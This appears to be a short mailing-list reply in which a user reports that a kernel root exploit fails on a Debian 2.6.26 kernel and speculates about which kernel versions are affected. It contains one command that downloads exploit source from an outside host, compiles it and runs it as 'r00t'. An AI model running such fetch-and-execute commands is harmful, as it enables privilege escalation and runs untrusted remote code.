Well, here's what 2.6.26-2-amd64 tells me on Debian:

steve@example.com:~$ wget -q http://thinrope.net/s/robert_you_suck.c -O - |gcc -x c -o r00t - && ./r00t
symbol table not available, aborting!
Process finished

I believe that means that the needed feature isn't even in 2.6.26,
since the compilation succeeded.  I would guess that the feature was
new in 2.6.32, and earlier kernels (the stable ones) don't need it.

Not-ashamed-of-a-2.6.26-kernel-why-would-I-be?-ly y'rs,
